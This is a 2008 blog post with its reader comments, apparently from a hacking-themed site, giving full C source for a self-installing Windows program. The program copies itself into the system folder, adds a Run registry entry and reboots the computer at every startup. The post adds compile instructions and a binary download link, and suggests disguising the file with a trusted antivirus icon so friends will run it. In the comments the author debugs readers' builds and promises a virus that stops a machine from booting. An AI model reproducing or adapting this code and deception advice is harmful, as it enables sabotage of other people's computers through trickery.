Home » C SOURCE CODES, VIRUS CREATION

Creating a Virus to restart the Computer at every Startup

Submitted by Srikanth on Friday, 17 October 200843 Comments

Today I will show you how to create a virus that restarts the computer upon every startup.That is, upon infection, the computer will get restarted every time the system is booted.This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations.And one more thing,none of the antivirus softwares detect’s this as a virus.I have coded this virus in C.So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h>

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the source code here
2. The downloaded file will be Sysres.C
3. Compile it in any 32-Bit compiler (Borland C++ 5.5 or higher is recommended)
4. The resulting .exe file is a virus and once you execute it will infect the system.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run 

 

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.

LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

Visitors who read this post, also read:

  1. Creating a Virus to Block Websites

  2. How to Create a Computer Virus?

  3. Run Programs at Startup without using Startup folder

  4. File Embedder Project in C

  5. How to Change the ICON of an EXE file ?


43 Comments »

  • Poppernut said:

    I am having trouble with the compiler. is it possible for me to download the exe file with having to do the compiling?

  • Srikanth (author) said:

    @ poppernut

    I have used Borland C++ 32 bit compiler.

    Here is the download link and help on how to install and configure the compiler.

    http://dn.codegear.com/article/20633

  • Poppernut said:

    The borland compiler is acting weird and it is impossible for me to accomplish anything. I tried Dev-C++ Compiler. Every thing works exept one thing. The line

    struct ffblk ffblk;//File block structure
    it says “Aggregate ffblk ffblk has incomplete type and cannot be defined”

    Any Idea?

    I know i asked this last time, but can i download the exe file alone?

  • Srikanth (author) said:

    @ poppernut

    replace the line

    struct ffblk ffblk

    with the following line and try

    struct ffblk {
    char ff_reserved[21];
    char ff_attrib;
    int ff_ftime;
    int ff_fdate;
    long ff_fsize;
    char ff_name[13];
    }ffblk;

  • Poppernut said:

    Lines:

    done=findfirst(quot;C:\\windows\\systemquot;,amp;ffblk,FA_DIREC);

    done=findfirst(quot;D:\\windows\\systemquot;,amp;ffblk,FA_DIREC);

    done=findfirst(quot;C:\\windows\\system\\sysres.exequot;,amp;ffblk,0);

    done=findfirst(quot;F:\\windows\\systemquot;,amp;ffblk,FA_DIREC);

    done=findfirst(quot;E:\\windows\\systemquot;,amp;ffblk,FA_DIREC);

    else

    {
    system(quot;REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
    \\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\sysres.exequot;);

    }
    And all of the

    if(done==0)

    lines have errors.

    It is possible that is has to with the compiler i am using, for it does not use command lines. I can#39;t use the borland one though. It keeps messing up.

    This project must be done by Friday for me. I have a schedule to stick too. I can look for something else meanwhile. Sorry to be complaining this much. s it posible for me to download the exe version of the file, after it has been compiled? That would make this much easier. Thank you for helping me with this matter.

  • Poppernut said:

    I tried the borland compiler again. This time, when i try to open the bcc32, it flashes. Is there another file i should be opening?

  • Srikanth (author) said:

    @ poppernut

    You can use Borland c++ 3.0 (16-bit compiler) also.

    C++ 5.5 can only be used via commandline.You have to access Bbcc32 via commandline.

    The syntax for compiling is Bbcc32 filename.c

    The compiled exe file will be in the same directory as of bcc32.exe.

    Anyways leave it if you find some difficulty.I’ll send the compiled project itself.

    The download link is

    http://rapidshare.com/files/158582448/Sysres.rar

  • Poppernut said:

    It worked. Thank you very much. I appreciate it. I also love your site. (If i understand correctly, your the host) The most useful of all is the “How to block websites.” Thanks :)

  • Srikanth (author) said:

    Thanks for your kind support…

  • Anonymous said:

    thanks for your valuable assist.

    Good Luck

  • Uriel said:

    Srikanth, thanks for sharing your knowledge in programming with us we appreciate it and good luck with the site! By the way, is it possible for me to change the file size of the exe file? i want it to look like a legit program or maybe you could teach me how to inject it into a legit file so that in the installation it would run with the legit program. thank you.

  • Srikanth (author) said:

    @ uriel,

    This is a bit difficult task.For that I should write a new post with all details.

    But you can definitely change the icon of the .exe file to resemble any legit program which I have already discussed!

  • Uriel said:

    @ srikanth,

    Thanks for that and I did changed the icon to camouflage it just as you discussed in your post, I appreciate your work a lot, I just tried it and wow it scared me alright, now I’ve got some questions. When the virus ran it shows the cmd window “C://Windows/System/sysres.exe” If the person I sent this to (don’t worry he’s a bad guy)acted fast enough within the 60 seconds time limit and deleted the sysres.exe file in the system folder (not in safe mode) but he did not delete the registry entry, will this virus still work? And one more thing if I used notepad (save the source code as .exe) to create the exe file instead of C++ will it work? I’m sorry for the numerous questions but I really want to learn. Thanks!!!

  • Srikanth (author) said:

    @ uriel

    If it is deleted once it doesn’t work(even though the entry exists in the registry)

    But it is not possible to create a .exe file using a notepad.You should use C++ compiler only..

  • Anonymous said:

    sir, suppose i have a exe file in my pendrive. now my question is is it possible that whenever i connect my pendrive the exe file should automatically get executed. if yes please help me out.sir give me the step by step procedure.

  • C J Chua said:

    Hi Srikanth; I think my niece’s computer got infected with your virus, I tried to get into safe mode in order to delete sysres.exe and remove sres via regedit but it restarted everytime on selecting safe mode, please advise, thanks.

  • Srikanth (author) said:

    @ C J Chuha

    If your system is restarting even in the safe mode,then it’s definitely not because of my virus.The virus becomes active only when the system is booted normally and not during the safe mode.So,please check your system for other faults!

  • il-muxu said:

    i downloaded the virus file you posted and tested it but the computer didn’t restart automatically! what do you think is the problem?

  • Srikanth (author) said:

    @ il-muxu

    It’ll restart from the next boot.That is the infection will come to effect from the next boot

  • il-muxu said:

    yes i did manually reboot the system after i pressed sysres but when it turned on again it stayed on, it didn’t restart pls help.
    thanks for the quick response

  • yuvaraj said:

    “THB” virus has affected my pc,how can i remove it please help me sir,

  • Srikanth (author) said:

    @ yuvaraj

    Install a good antivirus/antispyware and update it so that the updates are up to date.Then perform full system scan to remove the virus.Recommended antivirues are

    Kaspersky
    Norton
    Bitdefender

  • Mobin said:

    nice work man, really cool virus!!

    i wanted to know if there’s a virus, written in C, which can delete certain files so that the computer never boots again??

  • 27 said:

    Not bad, but why don’t you use getenv(”WINDIR”) to find the root partition? It would clean up your code, make it more readable, and increse its speed.

  • Srikanth (author) said:

    @ Mobin

    Yah,It’s possible to write such a virus…I’ll show how to write such a virus in my coming posts…..

  • VISHAL said:

    hi, Shrikant Myself vishal rathore
    you have programmed many viruses.i want to know ,
    Have u programmed any antivirus?

  • Srikanth (author) said:

    @ Vishal

    Only virus progrmming till now.AV programming requires much more greater skills.

  • jody said:

    Thanks for yer time and effort. nice page

  • Zals said:

    Hey Srikanth,i Appreciate ur knowledge and great works..and another thing i like in you is ur gud heart to share ur knowledge with us :)
    keep it up dude…nice website :)

  • Srikanth (author) said:

    @ Zals

    Thanks you for your kind support.It keeps me motivating!! :)

  • VISHAL said:

    Thanks for your reply…………..
    please give me your email id if you have no prob….
    bcoz i want to discuss some problem of my project with you.

  • Srikanth (author) said:

    @ Vishal

    Just send ur problem through the contact form on this site.Later I’ll reply from my ID….

  • vishal said:

    i want to know where are you.
    i want to know i am doing aproject on virus and antivirus.
    this is my M.Tech. degree project.
    so how can i start my project.
    what is the basic thing that can help me in understanding virus and antivirus programming………………

  • vishal said:

    thanks for ur reply.
    i want to become your friend…………………

  • Srikanth (author) said:

    @ Vishal

    My email is admin@gohacking.com….

    You can contact me through this ID…

  • raf said:

    hi srikanth i went through your page, nice. i wanted to know can i find and delete thb virus without an antivirus .

  • jets said:

    can i just download the virus and use it?
    i dont understand the codes

  • Srikanth (author) said:

    @ jets

    Yes you can download & use it without any problem.After testing it please follow the above mentioned info to remove it.

  • jets said:

    by remove u meant the steps about safe bootign then go to windows drive and delte then edit registry for it right?
    what if i test this on another old computer and wat do i do with this file, like the one i compiled and never opened?can i put it in recycle bin?
    thanks

  • naggappan said:

    I have compiled this pgm in the borland c++ (32-bit)compiler every thing works properly. But the only thing is it is not locking in the registry start up programs automatically when the exe file is clicked. but if i add it manually in the registry it works properly.

    is any wrong in the line ,

    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
    CurrentVersion\\Run \/v sres \/t REG_SZ \/d
    C:\\windows\\system\\ sysres.exe”);

    or do i have problem only in my compiler..

  • Srikanth (author) said:

    @ naggappan

    Are u using an antivirus with proactive defense?

    May I know which antivirus r u using?

    Compile the source by downloading it.Do not copy-paste the program…

  • Slim0123 said:

    Nice work Srikanth, but if you would use something like windows.h in the header file and will attach the exe with some ecard(flash exe files) then I think it would not even create any suspicion in the user’s mind, so better mask your programs before sending them to anyone else

    and one more problem is that, these dos based programs are not intended to work on different platforms(if you compile in 64bit machine, it will not work on 32bit and vice versa) so better if you could resolve this problem too(i m a newbie so better you let me know if I m wrong instead of just letting go the post)

  • Srikanth (author) said:

    @ Slimright

    The program that I have written is just a simple virus that can be coded in C.

    For advanced virues we have to make use of TSR concept.

Leave your response!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.

You can use these tags:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar.